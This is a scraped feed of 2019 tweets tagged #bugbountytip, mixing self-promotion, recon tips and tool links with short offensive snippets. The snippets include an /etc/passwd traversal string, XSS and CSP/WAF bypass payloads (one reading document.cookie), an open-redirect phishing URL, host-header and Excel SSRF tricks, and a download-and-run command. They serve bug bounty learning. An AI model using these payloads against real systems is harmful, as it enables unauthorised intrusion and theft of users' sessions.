0 Maximise Your Bug Bounty Tutorial 🤩 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/0gfcgW7uTM
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-11 10:06:48
0 Maximise Your Bug Bounty —- 🤑🤑🤑 Bug Bounty Tools — 🤩🤩 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/OgAsV7XrzP
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-11 09:13:57
1 And sometimes for (LFI) url?para=//..//..//..//..//..//..//..//..//etc//passwd// Works!! #bugbountytip #BugBounty #bugbountytips #bugbounty
Sudoka
@sudo_sudoka


2019-10-11 04:35:44
0 Today I learned that @binaryedgeio can find many more things than Shodan. I searched for Pulse Secure VPN and found many servers that Shodan does not index. You should give it a try at https://t.co/AZ43zPOuOW #BugBounty #bugbountytip #infosec #ThreatIntel #recon https://t.co/R0yBjlP0Gz
Murdockz
@Murdockz_CEH


2019-10-11 03:20:28
0 5 hours = 2 Critical 1. Admin ATO 2. GraphQL API privilege escalation Take a step back and learn from your mistakes then come back harder. Writeups soon. #bugbounty #infosec #bugbountytip
Ashraf
@m0rph1n3e


2019-10-10 15:10:32
0 I'VE FOUND API, TOKENS, AND SECRET KEYS. HOW TO VALIDATE BEFORE WRITING A REPORT? I WISH SOMEONE ANSWER ME ASAP. #BugBounty #bugbountytip #bugbountytips #infosec #CyberSecurity #WAF #SSTi #RCE #XSS #DataLeakage
Vincent RATISKOL
@vratiskol


2019-10-10 14:26:18
0 To illustrate my previous post, Burp Session handling tracer showing session validation with macro before sending request @Burp_Suite #bugbountytip https://t.co/F90REmVw0J
Michele Romano
@Mik317_


2019-10-10 14:19:50
2 What endpoints do you control when you come across a WP/Ghost instance? I've found a really good one: /blog/_wpeprivate/config.json, what about you? #BugBounty #bugbountytip
Security Executions Code
@pwn0sec


2019-10-10 12:58:41
1 Android App Penetration Testing #1 https://t.co/mlqVodvKJp #bugbounty #android #app #vulnerability #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-10 12:45:07
0 Maximise Your Bug Bounty With this Google Dork -- / -- inurl:fisheye AND inurl:changelog -site:https://t.co/G9MhGoP7IU -site:https://t.co/lc63NzPGi5 inurl:crucible AND inurl:changelog -site:https://t.co/G9MhGoP7IU -site:http://github #BugBounty #BugBountyTip #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-10 08:07:07
1 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/Yytl4wdZn9
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-10 08:06:46
0 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/RQMWrnQNek
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-10 08:06:27
0 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/OY9jiDUdDR
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-10 07:30:32
1 Simple Script for scanning ports of all grabbed subdomains using masscan for scan in $(cat <file-path>); do masscan -p1-65535 $(dig +short $scan|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head -1) --max-rate 1000 |& tee port_scan; done #BugBountyTips #bugbountytip #bugbounty
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-10 06:48:04
0 #BugBountyTip To discover domains deployed on Github for subdomain takeover. Go to https://t.co/oLL4MCjX1S and search for "There isn't a Github Pages site here" Googledork: intitle:"Site not found · GitHub Pages" intext:"There isn't a Github Pages site here"
Iamsaintmalik_
@saintmalik_


2019-10-09 20:30:16
0 Guys am getting this response while trying to load some xss scripts, any help on how I can bypass this @bugbountyforum @stokfredrik @s0md3v #bugbountytips #BugBounty #bugbountytip https://t.co/n3jWvvTt7e
m0z
@LooseSecurity


2019-10-09 19:02:07
3 A quick reminder that my bug bounty challenge site is still live with 2 challenges! The second of which is very advanced (incorporating a WAF). https://t.co/cNYQsVPQ3K #bugbountytips #bugbountytip #bugbounties #bugbountyprogreartip
Rémy Marot
@R_Marot


2019-10-09 19:01:00
0 Simple but useful tool if you only have an index file inside a .git directory (no luck :)) and want to have it human readable : https://t.co/QRHd7CbsYC #bugbountytip
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-09 18:58:38
0 One liner to import whole list of subdomains into Burp suite for automated scanning! cat <file-name> | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s #bugbountytips #bugbounty #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-09 17:35:17
0 Free Antivirus Be Like —// Follow Us -- https://t.co/S9CwjVYiHO… #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/XRSvgxtOyT
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-09 17:34:35
2 XSS Payload '"></title></script><img src=x onerror=confirm(1)> Follow Us -- https://t.co/S9CwjVYiHO… #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone
Mourad
@SecuAudit


2019-10-09 15:36:58
0 if you find a Form where you need ( Email + Date of birth + Zip code) to login , try to remove Zip code and Date of birth and send the form . #bugbountytip #bugbountytips #BugBounty https://t.co/uVw71NPXLo
tololovejoi
@tolo7010


2019-10-09 13:43:58
0 Question: Can i know how old are you sir? Please answer me Answer: (Please see my replies below): #bugbounty #bugbountytips #bugbountytip
kassih mouhssine
@KassihMouhssine


2019-10-09 13:29:09
0 account takeover write up all what u need is the email of the victim #bugbountytips #bugbountytip #cybersecurite https://t.co/W1DzdvWjST
Sanketh Sharath
@sharathsanketh


2019-10-09 12:57:14
0 Thanks very much @PentesterLand for featuring my blog post/article in your newsletter this week! Was pleasantly surprised. Appreciate it :) This is a lot of motivation for a beginner like me. Cheers! #bugbounty #bugbountytips #bugbountytip
Mourad
@SecuAudit


2019-10-09 11:11:35
0 Pentesting is becoming Harder and Harder , When I started in 2013 things were different , Now you need to grow your Mindset more than your Skills to Survive and achieve a decent living standard from BugBounty . #bugbounty #bugbountytip #pentesting #hackerone https://t.co/envVq5Lu0Q
Ammar Amer🇸🇾
@cry__pto


2019-10-09 09:03:26
6 Sub-Domain Takeover Tools: -1-SubOver:https://t.co/uzQ2X1rQ2v -2-Subjack:https://t.co/FdytR89u1w -3-autoSubTakeover:https://t.co/TWHTicVKnI -4-tko-subs:https://t.co/Tawtj1NvWc -5-HostileSubBruteforcer:https://t.co/3ydVulWy8l -6-Aquatone:https://t.co/6oxb7sgOhJ #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2019-10-09 07:53:40
2 2 udemy courses about ethical hacking free for a limited time both are 50 hours of useful content + high quality videos.and you will get a certification when finished prove that you finished the course. https://t.co/3xMEpNFL7u https://t.co/oZvixlG4LL #bugbountytip #hacking
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-09 07:07:53
0 Just saw your video on automation for finding 3rd level domains @thecybermentor It was nice!, Can use subfinder instead with -recursive option will do the same right? subfinder -d <domain> -recursive -silent -t 200 -v -o <out-put-file> #bugbounty #bugbountytip
Hritik Sharma
@iamHritikSH


2019-10-09 05:56:22
0 Server parses the XML but the problem is parameter entities are not working and whenever I try to use normal entity the server responds that content is not valid for application/xml, any tips community? #bugbounty #bugbountytips #bugbountytip
Brodie Codie
@brodie_codie


2019-10-09 03:04:35
3 Mood After finding another Bug #hackers #netsec #bugbounty #hacking #redteam #OSINT #recon #offsec #CTF #pentest #bugbountytip #bugbountytips #BrodieCodie #Metasploit #infosec #infosecurity https://t.co/bqwQBo5GVj
m0z
@LooseSecurity


2019-10-08 20:49:41
3 When I started out on my #BugBounty journey a little over 2 years ago, I read all the vulnerabilities on this page (and attempted to make a vuln web app to test some of them): https://t.co/M8VmqRlt8I I hope it helps someone else start their journey. #bugbountytip #bugbountytips
baluz🔥
@haknfuk


2019-10-08 14:42:47
0 If u feel like quitting stop feeling it #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-08 12:48:22
0 #bugbountytip if you ever encounter an endpoint filtering ' try \' it may work sometimes :) #sqli
Khaled Mohamed
@xelkomy


2019-10-08 12:42:46
0 awesome machine #hackthebox @hackthebox_eu #bugbountytip https://t.co/RtbEq1u5Z9
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-08 12:15:05
0 Hackers Turn Own Features Against It 🔥💕 #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-07 16:46:27
0 Seriously don't waste your time on searching for crlf injections, today i scanned nearly 30000+ unique domains and guess how many crlf's i found 0. #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-07 07:17:36
1 XSS Payload '"></title></script><img src=x onerror=confirm(1)> Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone
Sudoka
@sudo_sudoka


2019-10-07 04:50:48
0 Koha, the popular open source ILS, has Open Redirect at https://t.co/4FJZI7rSG7. Google Dork for inurl:/cgi-bin/koha/ Then send a request to victims like this: site[.]com/cgi-bin/koha/tracklinks.pl?uri=//phishing.site #bugbounty #bugbountytip #threatintel
Securisec 🚀
@securisec


2019-10-07 00:40:26
2 "RT RT LooseSecurity: Here's a #XSS write-up describing a specific WAF bypassing method I used to score a bounty a few months ago! https://t.co/bVfEZ0Drd4 #bugbountytips #BugBounty #bugbountytip"
Abood Nour
@AboodNour


2019-10-06 23:35:12
1 Found a better way to search GitHub projects using their own search filters. https://t.co/JJ7sn2DjQj In my case: `filename:file.php libname in:path` increased returned unique results to > 1.2K instead of ~20 returned from similar Google dork #BugBountyTip #BugBounty
m0z
@LooseSecurity


2019-10-06 22:32:42
5 Here's a #XSS write-up describing a specific WAF bypassing method I used to score a bounty a few months ago! https://t.co/NHrtVoOw04 #bugbountytips #BugBounty #bugbountytip
Katie Paxton-Fear
@InsiderPhD


2019-10-06 22:17:04
3 Coming this week: the first video in the 'Finding Your First Bug' series, we're going to look at Business Logic Errors, first we'll look at what they are, how to find them, examples of some real bugs and do a practical with Burp! #BugBounty #bugbountytips #bugbountytip https://t.co/KxOUGVSxR3
RHack
@Queseguridad


2019-10-06 19:38:39
0 Some payloads bypass XSS '"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> CloudFront 1%3C/script%3E%3Csvg/onload=prompt(document[`domain`])%3E Akamai <dETAILS/open/onToGgle=a=prompt,a(45) x> Imperva #Bugbounty #Bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-10-06 19:11:55
3 Findomain 0.5.0 is out! Now you can also send new subdomain alerts to @telegram! Check out the documentation for a detailed guide on how get it working! https://t.co/VKrEP3eY4d #subdomains #enumeration #monitoring #BugBounty #bugbountytip #reconnaissance #automation #webhooks
Joe Bradshaw
@SnakesNBradders


2019-10-06 17:01:47
0 Want to extend this to the bugbounty community as well for help. #bugbountytip https://t.co/eqYt3M5gFX
Ammar Amer🇸🇾
@cry__pto


2019-10-06 08:01:17
3 During web pentesting operations, when seeing a registration page you should try to register with an existing username, to see if you can enumerate users. This is what I saw on @PayPal. You can automate the whole process and get a list of website users. #bugbountytip #hacking https://t.co/WOZYUy4ulH
baluz🔥
@haknfuk


2019-10-06 06:15:57
1 #bugbounty #bugbountytip a channel for coders https://t.co/9JRrkSX6Pe
John mash
@Techhelplistcom


2019-10-06 05:00:01
0 i have uploaded 38 new articles as a pdf files about different fields of hacking to my github repository . enjoy! #bugbountytip #pentest #redteam #osint #Malware #cybersecurity #hacking #infosec https://t.co/fNomAuiIdC https://t.co/waACGyXyHC
Matt Palmer
@mattpalmer_au


2019-10-06 04:44:27
0 1. First Program: Indeed 2. Had difficulties: Google 3. Most used Platform: Bugcrowd and Google 4. Totally hate: 5. Most loved: Automation 6. For beginners: Read, read, read #bugbounty #bugbountytip #bugbountytips https://t.co/EevoSwrDA5
Ammar Amer🇸🇾
@cry__pto


2019-10-06 04:28:06
4 i have uploaded 38 new articles as a pdf files about different fields of hacking to my github repository . enjoy! #bugbountytip #pentest #redteam #osint #Malware #cybersecurity #hacking #infosec https://t.co/q2layzVpKz https://t.co/52Utrc6IMy
Imran nissar
@Imrannissar3


2019-10-05 22:25:11
0 Unexpected behaviour regarding web cache deception attack. Using Account 1 the page is being cached for 1 min and I am able to see all the information in incognito/different browser, but when I log in from a different account the page is not being cached #bugbountytip #hackerone
jub0bs
@jub0bs


2019-10-05 17:15:48
0 #BugBountyTip "[Blind SSRF] cannot be trivially exploited to retrieve sensitive data from back-end systems"... except when forged requests to an attacker-controlled server contain sensitive data (e.g. an API key in headers). Happened to me a few days ago. https://t.co/LTrqNqZ8zK
Nick (@hunt4p1zza)
@ngkogkos


2019-10-05 13:41:01
2 Custom wordlist for file/folder/param fuzzing: 1. Flag interesting requests w/ "WLIST" in Burp constantly 2. Sort requests w/ "WLIST" > HTTP History 3. Use CO2 plugin, send requests to CeWLer & Extract Words 4. Normalize wordlist to ASCII w/ IDE/bash #bugbounty #bugbountytip https://t.co/lazF02od9j
Jinone
@jinonehk


2019-10-05 09:57:12
0 <script src="https://t.co/1UvE8Y0fOd)"></script> bypass csp https://t.co/Jt9xQeag4g #BugBounty #BugBountyTip #WAF https://t.co/nz2OYbKBGx
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:14:53
0 Silent omission of certificate hostname verification in LibreSSL and BoringSSL Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/A2EJ8bgNyP
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:13:13
0 Malware Analysis 101 - Sandboxing Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/TXX3kDeuhe
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:09:35
0 Pushing Left, Like a Boss: Table of Contents Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/Xs9P4t11CR
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:08:16
0 Red Teamer’s Guide to Pulse Secure SSL VPN Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/7qf0K4KUKR
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:04:53
2 Download predictions details of ads plans of any business. Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/nj3z2KLprL
Nick (@hunt4p1zza)
@ngkogkos


2019-10-04 19:20:20
0 This is the bash function I use for #bugbounty on a target. Although I use checklists, enforcing organization via the filesystem forces me to do a good/clean job & serves as a 2nd checklist. Also, helps w/ being more efficient, as you can tailor cheatsheets/scripts. #bugbountytip https://t.co/B7gq2pvaZW
bugbountytip
@a_l_e_r_t_1_


2019-10-04 15:50:17
0 Chrome ❎ Firefox ✅ #Bugbountytip https://t.co/nB1NqVdEPK
Ammar Amer🇸🇾
@cry__pto


2019-10-04 13:37:36
2 The Multi-Tool Web Vulnerability Scanner. sometimes you may need to automate some work+ it may give you some ideas wget -O https://t.co/AVYJOtJVY1 https://t.co/eBwaz4GrYH && chmod +x https://t.co/AVYJOtJVY1 python https://t.co/AVYJOtJVY1 https://t.co/KdHhpMDaA0 #bugbountytip https://t.co/wMBgzbyvVx
Michele Romano
@Mik317_


2019-10-04 13:32:34
1 Bypassed a CSTI protection: {{alert(1)}} renders a <span> tag with value 1 ... JS not evaluated, but you can turn it in {{alert('<script>alert(1)</script>')}} and your day becomes a better day 😊 #bugbountytip
Shiva Kumawat
@ShivaKumawat88


2019-10-04 12:59:48
0 It may be a bug at #amazon mobile app #AmazonRocketDeals #AmazonGreatIndianFestival #AmazonRiddler #JokerMovie #bugbountytip #techno Here is video link--- https://t.co/I16F6WSj85
Evan Custodio
@defparam


2019-10-04 12:18:43
0 If an app accepts XLSX to convert to PDF/HTML it may run the file through MS Excel to eval formulas/convert. Try testing =WEBSERVICE(https://t.co/VXyqysIsep) and see if XML/HTML is added to the form (insta-SSRF). No clue excel even had this function #bugbountytip #bugbountytips
Flawwan
@Flawwan


2019-10-04 10:29:30
0 New blog post: Abusing PHP strip tags to bypass modern WAF to exploit XSS. https://t.co/MXRTMOuoEV #BugBounty #bugbountytip
Khaled Mohamed
@xelkomy


2019-10-04 08:30:35
0 #xss #bugbountytip #xelkomy Reflected Xss in Ibm POC https://t.co/YOoDCKbYHe
Imran nissar
@Imrannissar3


2019-10-04 07:58:45
0 Password reset host header injection Host: https://t.co/cxR3o4EYIs Bypassed by Host:https://t.co/cxR3o4EYIs"><a href='https://t.co/wgqXnDuzXt> #bugbountytip #bugbounty @Hacker0x01 @Bugcrowd
Verneet
@err0rrrrr


2019-10-04 06:41:10
1 Bypass CSP with: <embed /: script allowscriptaccess = always src = javascript:alert(document.cookie); https://t.co/dIZsSFrPmX> Just bypassed a Taxi company CSP :p @LooseSecurity #bugbountytip #bugbounty #bugcrowd
Evan Custodio
@defparam


2019-10-04 00:06:57
0 @AldoTheCrott @NahamSec @Twitch HTML injection in an email callback where I could control the CC addr and parts of the body. #bugbountytip test adding HTML into email callbacks. If the email puts the email address in the body try adding HTML after a '+'-sign alias (e.g. foo+<B><BR>[email protected])
A hacker's life
@Unknownuser1806


2019-10-03 20:49:05
0 Open redirect payloads https://t.co/ObQYpkmvym #payload,#hacking, #bugbounty,#bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-03 20:08:23
0 Bug Bounty = Hardwork + Will Power + Dedication #bugbounty #bugbountytip #devsecops #devops #secops #cybersecurity #hacking https://t.co/o9uZTW5vDa
Fisher
@Regala_


2019-10-03 18:31:03
0 @rudra16t @zseano Are you learning? Are you improving? Are you a better hacker than what you were a year ago? You get imposter syndrome if you compare yourself to others. YOU are the only one you should compare and compete with. #bugbountytip
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-10-03 15:39:29
0 #bugbountytips #bugbountytip Need help. Get good xss from cookie based xss. Any suggestion? Share your knowledge.
Masonhck357
@DanielM59720745


2019-10-03 14:56:24
0 #bugbountytip NEVER STOP DOING RECON: I ended up finding sensitive info on a subdomain that I found doing recon the second time around last week. I just found out that the subdomain is only used when they sell tickets for an event. They said that my timing was just perfect :)
intigriti
@intigriti


2019-10-03 14:18:30
9 Can't get CSRF with POST? Then GET it! Use 'change request method' in Burp Suite to check if the server also accepts GET requests. Thanks for the #BugBountyTip, @spaceraccoonsec! #HackWithIntigriti https://t.co/YVRPwZD6L0
bing0o
@hack1lab


2019-10-03 02:46:08
1 My new tool now on github, Web Technologies Detector, simple but useful for developers, penetration testers and bug hunters 😎 https://t.co/z5FF4P3v9j #bugbountytool #BugBountyTip #bing0o https://t.co/ewDkgbl1L4
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-02 17:14:40
9 CloudFront ~`XSS´ payload, shake dice. 🎲 <iframe srcdoc=<svg/o&#x6Eload=alert(1)>> #BugBounty #BugBountyTip #WAF #infosec
dedsec
@dedsec211


2019-10-02 16:05:42
0 used this website to get Latest bug bounty related tweets #bugbountytip https://t.co/rWZ5mUNUnp
baluz🔥
@haknfuk


2019-10-02 14:44:09
0 Google dorks recon #bugbounty #bugbountytip https://t.co/aWGbjpMjKS
Aziz Hakim
@hackerb0y_


2019-10-02 11:35:18
7 REST framework Admin Panel bypass and how I recon for this vulnerability 🤑🤑🤑🤑 https://t.co/KY8mRiWPQq #bugbounty #bugbountytips #infosec #bugbountytip #bugbountywriteup
Aziz Hakim
@hackerb0y_


2019-10-02 10:48:43
0 write-up: REST framework Admin Panel bypass and how I recon for this vulnerability https://t.co/KY8mRiWPQq #bugbounty #bugbountytips #infosec #bugbountytip #bugbountywriteup https://t.co/csw7FCpMLB
baluz🔥
@haknfuk


2019-10-02 02:15:40
0 stealing cookies even though there are http-only cookies https://t.co/ir0FsJkGkf #bugbounty #bugbountytip #xss
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-10-01 22:22:37
0 Post based Cors misconfiguration PoC #bugbountytips #bugbountytip https://t.co/0NQPWfxCLH
vict0ni
@vict0ni


2019-10-01 18:01:12
0 When testing for reflected XSS, ignore the "Accept Cookie" pop-up (don't dismiss it or accept it, just ignore it). The pop-up's code might reflect the URL in the source code #bugbountytip #bugbountytips #bugbounty
Sukhmeet Singh
@MadGuyyy


2019-10-01 15:08:49
0 #BugBountyTip If you don't want @Random_Robbie to appear in your Github search results, use this: -user:"random-robbie" "target.tld" thnx
Fisher
@Regala_


2019-10-01 10:33:22
0 I'll be starting my podcast on the 28th of October. Who's excited? Comment below 👇 what you'd love to hear and tag whom you'd be interested to have as guests 🥳 #bbp #bugbounty #bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-10-01 02:14:40
0 Findomain 0.4.1 is out! This release is specially dedicated to @SlackHQ! An issue that prevented pushing data to Slack webhooks is fixed and text formatting has been improved. Please check out https://t.co/5CskcM1Wrv #subdomains #hacking #recon #bunbounty #bugbountytip #monitoring
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-09-30 22:44:41
0 I am not sure whether to report or not. Found post based CORS misconfiguration. I can exploit it and get uuid and some cookies. Problem is post request body sends logged in user cookies and uuid value. Without it I got only one cookie value. #bugbountytips #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 18:56:37
0 #Linux #ThugLife 😎 #BugBounty #BugBountyTip Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt https://t.co/8Qn0GoBMmj
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 18:54:57
0 Bug Bounty Mafia !! 😎 #BugBounty #BugBountyTip Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt https://t.co/fVaTdy1Pz1
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-09-30 18:28:15
1 Try parameter pollution. Get array in output :) redacted\.com/something/?par1=aaa&par1=bbb Response: ["aaa", "bbb"] Got nothing better than this :( No sqli No xss No ssti No error for :( #bugbountytips #bugbountytip
Youssef Lahouifi
@YLahouifi


2019-09-30 17:30:26
0 directory brute forcing hosts recursively in one line of code : cat alivehosts.txt | xargs -n1 -I{} bash -c "cat wordlist.txt | xargs -n1 -I[] curl -s -o /dev/null -w '%{http_code} {}/[]\n' {}/[]" ps: you can use -P option for parallel processing #reconnaissance #bugbountytip
Andri Wahyudi 🕊️ ‏
@andripwn


2019-09-30 14:53:59
0 Web App Penetration Testing - #2 - Finding XSS Vulnerabilities with Burp https://t.co/oe5VBCcNOK #bugbounty #xss #bugbountytip #bugbountytips #hackerone
Andri Wahyudi 🕊️ ‏
@andripwn


2019-09-30 14:05:04
1 Web App Penetration Testing - #2 - Finding XSS Vulnerabilities with Burp https://t.co/0cMQH7RvaS #BugBounty #bugbountytip #bugbountytips
Securisec 🚀
@securisec


2019-09-30 13:51:32
1 "RT RT Madrobot_: I just published My recon Automation #bugbountytip #bugbounty #hackerone #recon #tools #bugcrowd Hacker0x01 Bugcrowd https://t.co/jEDTMNgs8B"
Manoj Kumar
@mkmaddyshock


2019-09-30 12:56:30
0 @amazon I know you people have private bug bounty where you guys pay well.. Why dont you do the same in public too.. We too deserve a token of appreciation... #BugBounty #bugbountytips #BugBountyTip #bugbountytip https://t.co/Oj7fjHaCNJ
Ashish Kunwar
@D0rkerDevil


2019-09-30 10:34:35
3 #bugbountytip do UDP scan and if you found port 500 then run ike-probe to see if it's vulnerable to Shared Secret Hash Leakage Weakness, then it will be easily exploitable. ;) #bugbounty #security
Arif Emre Demir
@onerror_xss


2019-09-30 10:32:44
0 Best xss cheatsheet in the world. Thx @Burp_Suite <3 https://t.co/emSf0IMzLa #bugbounty #bugbountytip #xss
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:52:16
0 Give your Career A Boost with 🏆🏆 C|EH Certification 🏆🏆 Join HackDoor for Getting C|EH Certified Today !! 💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/QiL5AGygD8
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:50:13
0 Bug Hunter ToolKit 💰💰 Comment If Your Favourite Tool is Missing ! 💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/EBE0h6JiEB
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:48:13
0 HIT LIKE IF U AGREE !!!! #WindowsUpdate Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/Lrp1bwXLIV
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:46:40
0 BUG HUNTER$ 💰💰💰💰💰 HIT LIKE IF U AGREE !!!! Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/rIOXTReuFD
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:45:01
1 BUG HUNTER$ 💰💰💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/yk9LKNVjtc
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:42:37
1 Best Search Engine For BUG HUNTER$ Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/DLFN6OzI84
hyperdummy
@dummyclout


2019-09-30 02:03:02
0 #bugbountytip: sometimes you can use the sanitizer’s behavior to get around a waf - sanitizer removes anything like <this> - waf blacklists anything like onerror/alert solution: on<x>error=al<x>ert(1) gets past the waf and the sanitizer returns onerror=alert(1)
SaN Th✪sH
@Madrobot_


2019-09-29 20:45:20
1 I just published My recon Automation #bugbountytip #bugbounty #hackerone #recon #tools #bugcrowd @Hacker0x01 @Bugcrowd https://t.co/yX1eputSKj
ghostlulz
@ghostlulz1337


2019-09-29 19:06:47
4 So you think getting RCE is hard and just for those uber l33t hackers, it's not, just look for exposed Docker APIs. Easy wins. More information on my blog: https://t.co/NUnZhChfJt #infosec #bugbountytips #pentest #redteam #docker #bugbountytip #BugBounty https://t.co/TJKcHswxoo
sagar yadav
@sagaryadav8742


2019-09-29 18:09:35
0 Finally month end with a small bounty 😄 Happy to #secure https://t.co/tVIlKKSeoq #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 #swag https://t.co/ZgCtVXfiMT
ghostlulz
@ghostlulz1337


2019-09-29 17:55:09
1 Some of my favorite things to look for in bug bounties are misconfigurations. A simple setting/config change can wreck an entire company. You can apply a patch to fix a CVE but for misconfigurations there generally is no patch to fix it. #bugbountytips #bugbountytip #infosec
Nikos Gkogkos
@ngkogkos


2019-09-29 16:48:10
0 Love the feeling of @albinowax's Turbo Intruder when brute-forcing endpoints. First I run small fuzzing, then I customise the python code for more granular fuzzing. If you are not using it, you are missing. #bugbountytip #BugBounty https://t.co/TNax1ftAYF
baluz🔥
@haknfuk


2019-09-29 13:41:46
